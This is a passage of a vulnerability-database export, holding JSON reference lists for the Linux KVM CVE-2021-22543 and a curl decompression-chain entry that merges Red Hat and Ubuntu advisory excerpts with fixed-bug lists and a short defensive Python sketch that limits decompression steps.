"url": "https://packetstormsecurity.com/files/164589/ubuntu-security-notice-usn-5120-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164562/red-hat-security-advisory-2021-3925-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167858/red-hat-security-advisory-2022-5640-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164331/ubuntu-security-notice-usn-5094-1.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021082206"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022020931"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3249"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2959"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164666/red-hat-security-advisory-2021-4000-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164028/red-hat-security-advisory-2021-3262-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2764"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3137"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3456"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3015"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3499"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3372"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3173"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163995/red-hat-security-advisory-2021-3363-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021101336"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164223/red-hat-security-advisory-2021-3598-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072069"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163767/red-hat-security-advisory-2021-3044-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3626"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164583/red-hat-security-advisory-2021-3949-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3536"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-memory-corruption-via-dev-kvm-35543"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164076/red-hat-security-advisory-2021-3454-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164477/red-hat-security-advisory-2021-3814-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2691"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164237/ubuntu-security-notice-usn-5071-3.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3389"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4156"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021100618"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021102111"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163865/red-hat-security-advisory-2021-3173-01.html"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3609"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22555"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-22555"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37576"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-37576"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5640"
},
{
"trust": 0.1,
"url": "https://github.com/jamesgeeee/cve-2021-22543"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3621"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3621"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3088"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-32399"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3363"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5071-1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5071-3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1043.47~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1043.47"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4000"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20934"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3653"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:3987"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3653"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20934"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-380980"
},
{
"db": "VULMON",
"id": "CVE-2021-22543"
},
{
"db": "PACKETSTORM",
"id": "164565"
},
{
"db": "PACKETSTORM",
"id": "163926"
},
{
"db": "PACKETSTORM",
"id": "163770"
},
{
"db": "PACKETSTORM",
"id": "164469"
},
{
"db": "PACKETSTORM",
"id": "163995"
},
{
"db": "PACKETSTORM",
"id": "164237"
},
{
"db": "PACKETSTORM",
"id": "164666"
},
{
"db": "PACKETSTORM",
"id": "164652"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
},
{
"db": "NVD",
"id": "CVE-2021-22543"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-380980",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-22543",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164565",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163926",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163770",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164469",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163995",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164237",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164666",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164652",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007425",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-22543",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-05-26T00:00:00",
"db": "VULHUB",
"id": "VHN-380980",
"ident": null
},
{
"date": "2021-05-26T00:00:00",
"db": "VULMON",
"id": "CVE-2021-22543",
"ident": null
},
{
"date": "2021-10-20T15:47:57",
"db": "PACKETSTORM",
"id": "164565",
"ident": null
},
{
"date": "2021-08-28T13:22:22",
"db": "PACKETSTORM",
"id": "163926",
"ident": null
},
{
"date": "2021-08-10T14:49:29",
"db": "PACKETSTORM",
"id": "163770",
"ident": null
},
{
"date": "2021-10-12T15:33:21",
"db": "PACKETSTORM",
"id": "164469",
"ident": null
},
{
"date": "2021-08-31T16:27:27",
"db": "PACKETSTORM",
"id": "163995",
"ident": null
},
{
"date": "2021-09-22T16:24:38",
"db": "PACKETSTORM",
"id": "164237",
"ident": null
},
{
"date": "2021-10-26T19:34:32",
"db": "PACKETSTORM",
"id": "164666",
"ident": null
},
{
"date": "2021-10-26T15:31:16",
"db": "PACKETSTORM",
"id": "164652",
"ident": null
},
{
"date": "2021-05-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-1684",
"ident": null
},
{
"date": "2022-02-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-007425",
"ident": null
},
{
"date": "2021-05-26T11:15:08.623000",
"db": "NVD",
"id": "CVE-2021-22543",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-04-01T00:00:00",
"db": "VULHUB",
"id": "VHN-380980",
"ident": null
},
{
"date": "2022-04-01T00:00:00",
"db": "VULMON",
"id": "CVE-2021-22543",
"ident": null
},
{
"date": "2022-07-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-1684",
"ident": null
},
{
"date": "2022-02-10T08:59:00",
"db": "JVNDB",
"id": "JVNDB-2021-007425",
"ident": null
},
{
"date": "2024-05-29T20:15:09.870000",
"db": "NVD",
"id": "CVE-2021-22543",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "164237"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-1684"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Buffer Error Vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007425"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202105-1684"
}
],
"trust": 0.6
}
}
VAR-202206-1900
Vulnerability from variot - Updated: 2026-04-10 23:28
curl < 7.84.0 supports "chained" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this "decompression chain" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps. The use of such a decompression chain could result in a "malloc bomb", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors. Harry Sintonen discovered that curl incorrectly handled certain file permissions. An attacker could possibly use this issue to expose sensitive information. This issue only affected Ubuntu 21.10 and Ubuntu 22.04 LTS. (CVE-2022-32207). Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/
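The unbounded decompression chain described above can be mitigated client-side by capping the number of accepted "links" before any decoding work begins. A minimal sketch in Python (illustrative only; the cap value, function name, and set of supported codings are assumptions, not curl's actual implementation):

```python
import gzip
import zlib

# Illustrative cap; curl 7.84.0 similarly bounds the decompression chain.
MAX_DECOMPRESS_CHAIN = 5

def decode_chain(body: bytes, content_encoding: str) -> bytes:
    """Apply each coding listed in Content-Encoding, refusing unbounded
    chains that could act as a "malloc bomb"."""
    codings = [c.strip() for c in content_encoding.split(",") if c.strip()]
    if len(codings) > MAX_DECOMPRESS_CHAIN:
        raise ValueError("too many decompression steps in chain")
    # The server applies encodings in listed order, so decode in reverse.
    for coding in reversed(codings):
        if coding == "gzip":
            body = gzip.decompress(body)
        elif coding == "deflate":
            body = zlib.decompress(body)
        elif coding == "identity":
            pass  # no transformation
        else:
            raise ValueError(f"unsupported coding: {coding}")
    return body
```

A doubly gzip-compressed body decodes with `Content-Encoding: gzip, gzip`, while a header listing dozens of steps is rejected up front, before any heap memory is spent on decompression.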
Security fixes:
-
golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
-
moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)
-
nodejs16: CRLF injection in node-undici (CVE-2022-31150)
-
nodejs/undici: Cookie headers uncleared on cross-origin redirect (CVE-2022-31151)
-
vm2: Sandbox Escape in vm2 (CVE-2022-36067)
Bug fixes:
-
RHACM 2.4 using deprecated APIs in managed clusters (BZ# 2041540)
-
vSphere network name doesn't allow entering spaces and doesn't reflect YAML changes (BZ# 2074766)
-
cluster update status is stuck, also update is not even visible (BZ# 2079418)
-
Policy that creates cluster role is showing as not compliant due to Request entity too large message (BZ# 2088486)
-
Upgraded from RHACM 2.2-->2.3-->2.4 and cannot create cluster (BZ# 2089490)
-
ACM Console Becomes Unusable After a Time (BZ# 2097464)
-
RHACM 2.4.6 images (BZ# 2100613)
-
Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster (BZ# 2102436)
-
ManagedClusters in Pending import state after ACM hub migration (BZ# 2102495)
-
Bugs fixed (https://bugzilla.redhat.com/):
2041540 - RHACM 2.4 using deprecated APIs in managed clusters 2074766 - vSphere network name doesn't allow entering spaces and doesn't reflect YAML changes 2079418 - cluster update status is stuck, also update is not even visible 2088486 - Policy that creates cluster role is showing as not compliant due to Request entity too large message 2089490 - Upgraded from RHACM 2.2-->2.3-->2.4 and cannot create cluster 2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add 2097464 - ACM Console Becomes Unusable After a Time 2100613 - RHACM 2.4.6 images 2102436 - Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster 2102495 - ManagedClusters in Pending import state after ACM hub migration 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS 2109354 - CVE-2022-31150 nodejs16: CRLF injection in node-undici 2121396 - CVE-2022-31151 nodejs/undici: Cookie headers uncleared on cross-origin redirect 2124794 - CVE-2022-36067 vm2: Sandbox Escape in vm2
- Bugs fixed (https://bugzilla.redhat.com/):
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read 2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header 2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
- JIRA issues fixed (https://issues.jboss.org/):
LOG-2647 - Add link to log console from pod views LOG-2801 - After upgrade all logs are stored in app indices LOG-2917 - Changing refresh interval throws error when the 'Query' field is empty
- This advisory contains the following OpenShift Virtualization 4.12.0 images:
Security Fix(es):
-
golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
-
kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
-
golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
-
golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
-
golang: net/http: improper sanitization of Transfer-Encoding header (CVE-2022-1705)
-
golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)
-
golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
-
golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
-
golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
-
golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)
-
golang: syscall: faccessat checks wrong group (CVE-2022-29526)
-
golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)
-
golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
-
golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)
-
golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)
-
golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)
-
golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working (CVE-2022-32148)
-
golang: crypto/tls: session tickets lack random ticket_age_add (CVE-2022-30629)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
RHEL-8-CNV-4.12
============= bridge-marker-container-v4.12.0-24 cluster-network-addons-operator-container-v4.12.0-24 cnv-containernetworking-plugins-container-v4.12.0-24 cnv-must-gather-container-v4.12.0-58 hco-bundle-registry-container-v4.12.0-769 hostpath-csi-driver-container-v4.12.0-30 hostpath-provisioner-container-v4.12.0-30 hostpath-provisioner-operator-container-v4.12.0-31 hyperconverged-cluster-operator-container-v4.12.0-96 hyperconverged-cluster-webhook-container-v4.12.0-96 kubemacpool-container-v4.12.0-24 kubevirt-console-plugin-container-v4.12.0-182 kubevirt-ssp-operator-container-v4.12.0-64 kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55 kubevirt-tekton-tasks-copy-template-container-v4.12.0-55 kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55 kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55 kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55 kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55 kubevirt-tekton-tasks-operator-container-v4.12.0-40 kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55 kubevirt-template-validator-container-v4.12.0-32 libguestfs-tools-container-v4.12.0-255 ovs-cni-marker-container-v4.12.0-24 ovs-cni-plugin-container-v4.12.0-24 virt-api-container-v4.12.0-255 virt-artifacts-server-container-v4.12.0-255 virt-cdi-apiserver-container-v4.12.0-72 virt-cdi-cloner-container-v4.12.0-72 virt-cdi-controller-container-v4.12.0-72 virt-cdi-importer-container-v4.12.0-72 virt-cdi-operator-container-v4.12.0-72 virt-cdi-uploadproxy-container-v4.12.0-71 virt-cdi-uploadserver-container-v4.12.0-72 virt-controller-container-v4.12.0-255 virt-exportproxy-container-v4.12.0-255 virt-exportserver-container-v4.12.0-255 virt-handler-container-v4.12.0-255 virt-launcher-container-v4.12.0-255 virt-operator-container-v4.12.0-255 virtio-win-container-v4.12.0-10 vm-network-latency-checkup-container-v4.12.0-89
- Solution:
Before applying this update, you must apply all previously released errata relevant to your system.
To apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1719190 - Unable to cancel live-migration if virt-launcher pod in pending state
2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume
2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache
2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error
2040377 - Unable to delete failed VMIM after VM deleted
2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed
2052556 - Metric "kubevirt_num_virt_handlers_by_node_running_virt_launcher" reporting incorrect value
2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements
2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString
2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control
2060499 - [RFE] Cannot add additional service (or other objects) to VM template
2069098 - Large scale |VMs migration is slow due to low migration parallelism
2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass
2071491 - Storage Throughput metrics are incorrect in Overview
2072797 - Metrics in Virtualization -> Overview period is not clear or configurable
2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers
2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group
2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode
2086551 - Min CPU feature found in labels
2087724 - Default template show no boot source even there are auto-upload boot sources
2088129 - [SSP] webhook does not comply with restricted security context
2088464 - [CDI] cdi-deployment does not comply with restricted security context
2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR
2089744 - HCO should label its control plane namespace to admit pods at privileged security level
2089751 - 4.12.0 containers
2089804 - 4.12.0 rpms
2091856 - "Edit BootSource" action should have more explicit information when disabled
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add
2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer
2093771 - The disk source should be PVC if the template has no auto-update boot source
2093996 - kubectl get vmi API should always return primary interface if exist
2094202 - Cloud-init username field should have hint
2096285 - KubeVirt CR API documentation is missing docs for many fields
2096780 - [RFE] Add ssh-key and sysprep to template scripts tab
2097436 - Online disk expansion ignores filesystem overhead change
2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP
2099556 - [RFE] Add option to enable RDP service for windows vm
2099573 - [RFE] Improve template's message about not editable
2099923 - [RFE] Merge "SSH access" and "SSH command" into one
2100290 - Error is not dismissed on catalog review page
2100436 - VM list filtering ignores VMs in error-states
2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS
2100629 - Update nested support KBASE article
2100679 - The number of hardware devices is not correct in vm overview tab
2100682 - All hardware devices get deleted while just delete one
2100684 - Workload profile are not editable during creation and after creation
2101144 - VM filter has two "Other" checkboxes which are triggered together
2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode
2101167 - Edit buttons clickable area is too large.
2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id
2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state
2101390 - Easy to miss the "tick" when adding GPU device to vm via UI
2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id
2101423 - wrong user name on using ignition
2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page
2101445 - "Pending changes - Boot Order"
2101454 - Cannot add PVC boot source to template in 'Edit Boot Source Reference' view as a non-priv user
2101499 - Cannot add NIC to VM template as non-priv user
2101501 - NAME parameter in VM template has no effect.
2101628 - non-priv user cannot load dataSource while edit template's rootdisk
2101667 - VMI view is not aligned with vm and tempates
2101681 - All templates are labeling "source available" in template list page
2102074 - VM Creation time on VM Overview Details card lacks string
2102125 - vm clone modal is displaying DV size instead of PVC size
2102132 - align the utilization card of single VM overview with the design
2102138 - Should the word "new" be removed from "Create new VirtualMachine from catalog"?
2102256 - Add button moved to right
2102448 - VM disk is deleted by uncheck "Delete disks (1x)" on delete modal
2102475 - Template 'vm-template-example' should be filtered by 'Fedora' rather than 'Other'
2102561 - sysprep-info should link to downstream doc
2102737 - Clone a VM should lead to vm overview tab
2102740 - "Save" button on vm clone modal should be "Clone"
2103806 - "404: Not Found" appears shortly by clicking the PVC link on vm disk tab
2103807 - PVC is not named by VM name while creating vm quickly
2103817 - Workload profile values in vm details should align with template's value
2103844 - VM nic model is empty
2104331 - VM list page scroll up automatically
2104402 - VM create button is not enabled while adding multiple environment disks
2104422 - Storage status report "OpenShift Data Foundation is not available" even the operator is installed
2104424 - Enable descheduler or hide it on template's scheduling tab
2104479 - [4.12] Cloned VM's snapshot restore fails if the source VM disk is deleted
2104480 - Alerts in VM overview tab disappeared after a few seconds
2104785 - "Add disk" and "Disks" are on the same line
2104859 - [RFE] Add "Copy SSH command" to VM action list
2105257 - Can't set log verbosity level for virt-operator pod
2106175 - All pages are crashed after visit Virtualization -> Overview
2106963 - Cannot add configmap for windows VM
2107279 - VM Template's bootable disk can be marked as bootable
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal
2108339 - datasource does not provide timestamp when updated
2108638 - When choosing a vm or template while in all-namespace, and returning to list, namespace is changed
2109818 - Upstream metrics documentation is not detailed enough
2109975 - DataVolume fails to import "cirros-container-disk-demo" image
2110256 - Storage -> PVC -> upload data, does not support source reference
2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls
2111240 - GiB changes to B in Template's Edit boot source reference modal
2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics
2111328 - kubevirt plugin console crashed after visit vmi page
2111378 - VM SSH command generated by UI points at api VIP
2111744 - Cloned template should not label app.kubernetes.io/name: common-templates
2111794 - the virtlogd process is taking too much RAM! (17468Ki > 17Mi)
2112900 - button style are different
2114516 - Nothing happens after clicking on Fedora cloud image list link
2114636 - The style of displayed items are not unified on VM tabs
2114683 - VM overview tab is crashed just after the vm is created
2115257 - Need to Change system-product-name to "OpenShift Virtualization" in CNV-4.12
2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass
2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items
2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates
2116225 - The filter keyword of the related operator 'Openshift Data Foundation' is 'OCS' rather than 'ODF'
2116644 - Importer pod is failing to start with error "MountVolume.SetUp failed for volume "cdi-proxy-cert-vol" : configmap "custom-ca" not found"
2117549 - Cannot edit cloud-init data after add ssh key
2117803 - Cannot edit ssh even vm is stopped
2117813 - Improve descriptive text of VM details while VM is off
2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs
2118257 - outdated doc link tolerations modal
2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format
2119069 - Unable to start windows VMs on PSI setups
2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2119309 - readinessProbe in VM stays on failed
2119615 - Change the disk size causes the unit changed
2120907 - Cannot filter disks by label
2121320 - Negative values in migration metrics
2122236 - Failing to delete HCO with SSP sticking around
2122990 - VMExport should check APIGroup
2124147 - "ReadOnlyMany" should not be added to supported values in memory dump
2124307 - Ui crash/stuck on loading when trying to detach disk on a VM
2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it
2124555 - View documentation link on MigrationPolicies page does not work
2124557 - MigrationPolicy description is not displayed on Details page
2124558 - Non-privileged user can start MigrationPolicy creation
2124565 - Deleted DataSource reappears in list
2124572 - First annotation can not be added to DataSource
2124582 - Filtering VMs by OS does not work
2124594 - Docker URL validation is inconsistent over application
2124597 - Wrong case in Create DataSource menu
2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile
2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state
2127787 - Expose the PVC source of the dataSource on UI
2127843 - UI crashed by selecting "Live migration network"
2127931 - Change default time range on Virtualization -> Overview -> Monitoring dashboard to 30 minutes
2127947 - cluster-network-addons-config tlsSecurityProfile takes a long time to update after setting APIServer
2128002 - Error after VM template deletion
2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards
2128872 - [4.11]Can't restore cloned VM
2128948 - Cannot create DataSource from default YAML
2128949 - Cannot create MigrationPolicy from example YAML
2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24
2129013 - Mark Windows 11 as TechPreview
2129234 - Service is not deleted along with the VM when the VM is created from a template with service
2129301 - Cloud-init network data is not wiped out on unchecking the 'Add network data' checkbox
2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook
2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV
2130588 - crypto-policy : Common Ciphers support by apiserver and hco
2130695 - crypto-policy : Logging Improvement and publish the source of ciphers
2130909 - Non-privileged user can start DataSource creation
2131157 - KV data transfer rate chart in VM Metrics tab is not displayed
2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough
2131674 - Bump virtlogd memory requirement to 20Mi
2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11
2132682 - Default YAML entity name convention.
2132721 - Delete dialogs
2132744 - Description text is missing in Live Migrations section
2132746 - Background is broken in Virtualization Monitoring page
2132783 - VM can not be created from Template with edited boot source
2132793 - Edited Template BSR is not saved
2132932 - Typo in PVC size units menu
2133540 - [pod security violation audit] Audit violation in "cni-plugins" container should be fixed
2133541 - [pod security violation audit] Audit violation in "bridge-marker" container should be fixed
2133542 - [pod security violation audit] Audit violation in "manager" container should be fixed
2133543 - [pod security violation audit] Audit violation in "kube-rbac-proxy" container should be fixed
2133655 - [pod security violation audit] Audit violation in "cdi-operator" container should be fixed
2133656 - [4.12][pod security violation audit] Audit violation in "hostpath-provisioner-operator" container should be fixed
2133659 - [pod security violation audit] Audit violation in "cdi-controller" container should be fixed
2133660 - [pod security violation audit] Audit violation in "cdi-source-update-poller" container should be fixed
